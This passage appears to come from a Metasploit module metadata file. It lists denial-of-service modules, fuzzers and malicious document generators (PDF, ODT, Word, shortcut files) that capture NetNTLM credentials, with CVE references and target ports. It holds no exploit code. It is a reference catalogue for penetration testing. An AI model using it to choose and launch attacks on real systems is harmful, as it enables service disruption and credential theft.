"name": "Attack", - "description": "Run Denial of Service" - } - ] - }, - "auxiliary_dos/windows/smb/vista_negotiate_stop": { - "name": "Microsoft Vista SP0 SMB Negotiate Protocol DoS", - "fullname": "auxiliary/dos/windows/smb/vista_negotiate_stop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module exploits a flaw in Windows Vista that allows a remote\n unauthenticated attacker to disable the SMB service. This vulnerability\n was silently fixed in Microsoft Vista Service Pack 1.", - "references": [ - "OSVDB-64341" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/vista_negotiate_stop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smtp/ms06_019_exchange": { - "name": "MS06-019 Exchange MODPROP Heap Overflow", - "fullname": "auxiliary/dos/windows/smtp/ms06_019_exchange", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-11-12", - "type": "auxiliary", - "author": [ - "pusscat " - ], - "description": "This module triggers a heap overflow vulnerability in MS\n Exchange that occurs when multiple malformed MODPROP values\n occur in a VCAL request.", - "references": [ - "BID-17908", - "CVE-2006-0027", - "MSB-MS06-019" - ], - "platform": "", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb", - "is_install_path": true, - "ref_name": "dos/windows/smtp/ms06_019_exchange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ssh/sysax_sshd_kexchange": { - "name": "Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service", - "fullname": "auxiliary/dos/windows/ssh/sysax_sshd_kexchange", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-03-17", - "type": "auxiliary", - "author": [ - "Matt \"hostess\" Andreko " - ], - "description": "This module sends a specially-crafted SSH Key Exchange causing the service to\n crash.", - "references": [ - "OSVDB-92081", - "URL-https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html" - ], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb", - "is_install_path": true, - "ref_name": "dos/windows/ssh/sysax_sshd_kexchange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/tftp/pt360_write": { - "name": "PacketTrap TFTP Server 2.2.5459.0 DoS", - "fullname": "auxiliary/dos/windows/tftp/pt360_write", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-29", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "The PacketTrap TFTP server version 2.2.5459.0 can be\n brought down by sending a special write request.", - "references": [ - "CVE-2008-1311", - "OSVDB-42932", - "EDB-6863" - ], - "platform": "", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/tftp/pt360_write.rb", - "is_install_path": true, - "ref_name": "dos/windows/tftp/pt360_write", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/tftp/solarwinds": { - "name": "SolarWinds TFTP Server 10.4.0.10 Denial of Service", - "fullname": "auxiliary/dos/windows/tftp/solarwinds", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-05-21", - "type": "auxiliary", - "author": [ - "Nullthreat" - ], - "description": "The SolarWinds TFTP server can be shut down by sending a 'netascii' read\n request with a specially crafted file name.", - "references": [ - "CVE-2010-2115", - "OSVDB-64845", - "EDB-12683" - ], - "platform": "", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/tftp/solarwinds.rb", - "is_install_path": true, - "ref_name": "dos/windows/tftp/solarwinds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/wireshark/capwap": { - "name": "Wireshark CAPWAP Dissector DoS", - "fullname": "auxiliary/dos/wireshark/capwap", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-04-28", - "type": "auxiliary", - "author": [ - "Laurent Butti", - "j0sm1" - ], - "description": "This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well\n as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a\n packet correctly when an incorrect length is given.", - "references": [ - "CVE-2013-4074", - "OSVDB-94091", - "BID-60500" - ], - "platform": "", - "arch": "", - "rport": 5247, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/wireshark/capwap.rb", - "is_install_path": true, - "ref_name": "dos/wireshark/capwap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/wireshark/chunked": { - "name": "Wireshark chunked_encoding_dissector Function DOS", - "fullname": "auxiliary/dos/wireshark/chunked", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-02-22", - "type": "auxiliary", - "author": [ - "Matteo Cantoni " - ], - "description": "Wireshark crash when dissecting an HTTP chunked response.\n Versions affected: 0.99.5 (Bug 1394)", - "references": [ - "CVE-2007-3389", - "OSVDB-37643", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/wireshark/chunked.rb", - "is_install_path": true, - "ref_name": "dos/wireshark/chunked", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/wireshark/cldap": { - "name": "Wireshark CLDAP Dissector DOS", - "fullname": "auxiliary/dos/wireshark/cldap", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-03-01", - "type": "auxiliary", - "author": [ - "joernchen (Phenoelit)>" - ], - "description": "This module causes infinite recursion to occur within the\n CLDAP dissector by sending a specially crafted UDP packet.", - "references": [ - "CVE-2011-1140", - "OSVDB-71552", - "URL-https://www.wireshark.org/security/wnpa-sec-2011-04.html", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5717" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/wireshark/cldap.rb", - "is_install_path": true, - "ref_name": "dos/wireshark/cldap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/wireshark/ldap": { - "name": "Wireshark LDAP Dissector DOS", - "fullname": "auxiliary/dos/wireshark/ldap", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-03-28", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers\n to cause a denial of service (application crash) via a malformed packet.", - "references": [ - "CVE-2008-1562", - "OSVDB-43840" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/wireshark/ldap.rb", - "is_install_path": true, - "ref_name": "dos/wireshark/ldap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fileformat/badpdf": { - "name": "BADPDF Malicious PDF Creator", - "fullname": "auxiliary/fileformat/badpdf", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Assaf Baharav", - "Yaron Fruchtmann", - "Ido Solomon", - "Richard Davy - secureyourit.co.uk" - ], - "description": "This module can either creates a blank PDF file which contains a UNC link which can be used\n to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary\n code into an existing PDF document if possible.", - "references": [ - "CVE-2018-4993", - "URL-https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/fileformat/badpdf.rb", - "is_install_path": true, - "ref_name": "fileformat/badpdf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fileformat/multidrop": { - "name": "Windows SMB Multi Dropper", - "fullname": "auxiliary/fileformat/multidrop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Richard Davy - secureyourit.co.uk", - "mubix ", - "asoto-r7", - "hyp3rlinx", - "bcoles " - ], - "description": "This module dependent on the given filename extension creates either\n a .lnk, .scf, .url, .xml, .library-ms, or desktop.ini file which includes\n a reference to the specified remote host, causing SMB connections to be\n initiated from any user that views the file.", - "references": [ - "URL-https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018", - "URL-https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/", - "URL-https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/", - "URL-https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-02 01:28:52 +0000", - "path": "/modules/auxiliary/fileformat/multidrop.rb", - "is_install_path": true, - "ref_name": "fileformat/multidrop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fileformat/odt_badodt": { - "name": "LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator", - "fullname": "auxiliary/fileformat/odt_badodt", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-05-01", - "type": "auxiliary", - "author": [ - "Richard Davy - secureyourit.co.uk" - ], - "description": "Generates a Malicious ODT File which can be used with auxiliary/server/capture/smb or similar to capture hashes.", - "references": [ - "CVE-2018-10583", - "URL-https://secureyourit.co.uk/wp/2018/05/01/creating-malicious-odt-files/" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2018-06-06 11:26:20 +0000", - "path": "/modules/auxiliary/fileformat/odt_badodt.rb", - "is_install_path": true, - "ref_name": "fileformat/odt_badodt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fileformat/word_unc_injector": { - "name": "Microsoft Word UNC Path Injector", - "fullname": "auxiliary/fileformat/word_unc_injector", - "aliases": [ - "auxiliary/docx/word_unc_injector" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "SphaZ " - ], - "description": "This module modifies a .docx file that will, upon opening, submit stored\n netNTLM credentials to a remote host. It can also create an empty docx file. If\n emailed the receiver needs to put the document in editing mode before the remote\n server will be contacted. Preview and read-only mode do not work. Verified to work\n with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.", - "references": [ - "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-04-30 18:26:15 +0000", - "path": "/modules/auxiliary/fileformat/word_unc_injector.rb", - "is_install_path": true, - "ref_name": "fileformat/word_unc_injector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/dns/dns_fuzzer": { - "name": "DNS and DNSSEC Fuzzer", - "fullname": "auxiliary/fuzzers/dns/dns_fuzzer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "pello " - ], - "description": "This module will connect to a DNS server and perform DNS and\n DNSSEC protocol-level fuzzing. Note that this module may inadvertently\n crash the target server.", - "references": [], - "platform": "", - "arch": "", - "rport": 53, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2019-12-07 08:01:52 +0000", - "path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb", - "is_install_path": true, - "ref_name": "fuzzers/dns/dns_fuzzer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ftp/client_ftp": { - "name": "Simple FTP Client Fuzzer", - "fullname": "auxiliary/fuzzers/ftp/client_ftp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "corelanc0d3r " - ], - "description": "This module will serve an FTP server and perform FTP client interaction fuzzing", - "references": [ - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/ftp/client_ftp.rb", - "is_install_path": true, - "ref_name": "fuzzers/ftp/client_ftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ftp/ftp_pre_post": { - "name": "Simple FTP Fuzzer", - "fullname": "auxiliary/fuzzers/ftp/ftp_pre_post", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "corelanc0d3r ", - "jduck " - ], - "description": "This module will connect to a FTP server and perform pre- and post-authentication fuzzing", - "references": [], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2019-03-05 03:38:51 +0000", - "path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb", - "is_install_path": true, - "ref_name": "fuzzers/ftp/ftp_pre_post", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/http/http_form_field": { - "name": "HTTP Form Field Fuzzer", - "fullname": "auxiliary/fuzzers/http/http_form_field", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "corelanc0d3r", - "Paulino Calderon " - ], - "description": "This module will grab all fields from a form,\n and launch a series of POST actions, fuzzing the contents\n of the form fields. You can optionally fuzz headers too\n (option is enabled by default)", - "references": [ - "URL-http://www.corelan.be:8800/index.php/2010/11/12/metasploit-module-http-form-field-fuzzer" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/fuzzers/http/http_form_field.rb", - "is_install_path": true, - "ref_name": "fuzzers/http/http_form_field", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/http/http_get_uri_long": { - "name": "HTTP GET Request URI Fuzzer (Incrementing Lengths)", - "fullname": "auxiliary/fuzzers/http/http_get_uri_long", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullthreat" - ], - "description": "This module sends a series of HTTP GET request with incrementing URL lengths.", - "references": [], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/http/http_get_uri_long.rb", - "is_install_path": true, - "ref_name": "fuzzers/http/http_get_uri_long", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/http/http_get_uri_strings": { - "name": "HTTP GET Request URI Fuzzer (Fuzzer Strings)", - "fullname": "auxiliary/fuzzers/http/http_get_uri_strings", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullthreat" - ], - "description": "This module sends a series of HTTP GET request with malicious URIs.", - "references": [], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb", - "is_install_path": true, - "ref_name": "fuzzers/http/http_get_uri_strings", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ntp/ntp_protocol_fuzzer": { - "name": "NTP Protocol Fuzzer", - "fullname": "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Jon Hart " - ], - "description": "A simplistic fuzzer for the Network Time Protocol that sends the\n following probes to understand NTP and look for anomalous NTP behavior:\n\n * All possible combinations of NTP versions and modes, even if not\n allowed or specified in the RFCs\n * Short versions of the above\n * Short, invalid datagrams\n * Full-size, random datagrams\n * All possible NTP control messages\n * All possible NTP private messages\n\n This findings of this fuzzer are not necessarily indicative of bugs,\n let alone vulnerabilities, rather they point out interesting things\n that might deserve more attention. Furthermore, this module is not\n particularly intelligent and there are many more areas of NTP that\n could be explored, including:\n\n * Warn if the response is 100% identical to the request\n * Warn if the \"mode\" (if applicable) doesn't align with what we expect,\n * Filter out the 12-byte mode 6 unsupported opcode errors.\n * Fuzz the control message payload offset/size/etc. There be bugs", - "references": [], - "platform": "", - "arch": "", - "rport": 123, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-04-06 14:45:11 +0000", - "path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb", - "is_install_path": true, - "ref_name": "fuzzers/ntp/ntp_protocol_fuzzer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb2_negotiate_corrupt": { - "name": "SMB Negotiate SMB2 Dialect Corruption", - "fullname": "auxiliary/fuzzers/smb/smb2_negotiate_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB negotiate requests that advertise a\n SMB2 dialect with corrupted bytes.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-08-24 21:38:44 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb2_negotiate_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_create_pipe": { - "name": "SMB Create Pipe Request Fuzzer", - "fullname": "auxiliary/fuzzers/smb/smb_create_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB create pipe\n requests using malicious strings.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_create_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_create_pipe_corrupt": { - "name": "SMB Create Pipe Request Corruption", - "fullname": "auxiliary/fuzzers/smb/smb_create_pipe_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB create pipe requests with corrupted bytes.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_create_pipe_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_negotiate_corrupt": { - "name": "SMB Negotiate Dialect Corruption", - "fullname": "auxiliary/fuzzers/smb/smb_negotiate_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB negotiate requests with corrupted bytes", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-08-24 21:38:44 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_negotiate_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_ntlm1_login_corrupt": { - "name": "SMB NTLMv1 Login Request Corruption", - "fullname": "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB login requests using\n the NTLMv1 protocol with corrupted bytes.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-07 20:22:56 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_ntlm1_login_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_tree_connect": { - "name": "SMB Tree Connect Request Fuzzer", - "fullname": "auxiliary/fuzzers/smb/smb_tree_connect", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB tree connect\n requests using malicious strings.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_tree_connect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_tree_connect_corrupt": { - "name": "SMB Tree Connect Request Corruption", - "fullname": "auxiliary/fuzzers/smb/smb_tree_connect_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB tree connect requests with corrupted bytes.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_tree_connect_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smtp/smtp_fuzzer": { - "name": "SMTP Simple Fuzzer", - "fullname": "auxiliary/fuzzers/smtp/smtp_fuzzer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "justme" - ], - "description": "SMTP Simple Fuzzer", - "references": [ - "URL-http://www.ietf.org/rfc/rfc2821.txt" - ], - "platform": "", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb", - "is_install_path": true, - "ref_name": "fuzzers/smtp/smtp_fuzzer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ssh/ssh_kexinit_corrupt": { - "name": "SSH Key Exchange Init Corruption", - "fullname": "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SSH requests with a corrupted initial key exchange payload.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/ssh/ssh_kexinit_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ssh/ssh_version_15": { - "name": "SSH 1.5 Version Fuzzer", - "fullname": "auxiliary/fuzzers/ssh/ssh_version_15", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SSH requests with malicious version strings.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb", - "is_install_path": true, - "ref_name": "fuzzers/ssh/ssh_version_15", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ssh/ssh_version_2": { - "name": "SSH 2.0 Version Fuzzer", - "fullname": "auxiliary/fuzzers/ssh/ssh_version_2", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SSH requests with malicious version strings.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb", - "is_install_path": true, - "ref_name": "fuzzers/ssh/ssh_version_2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ssh/ssh_version_corrupt": { - "name": "SSH Version Corruption", - "fullname": "auxiliary/fuzzers/ssh/ssh_version_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SSH requests with a corrupted version string", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/ssh/ssh_version_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/tds/tds_login_corrupt": { - "name": "TDS Protocol Login Request Corruption Fuzzer", - "fullname": "auxiliary/fuzzers/tds/tds_login_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of malformed TDS login requests.", - "references": [], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 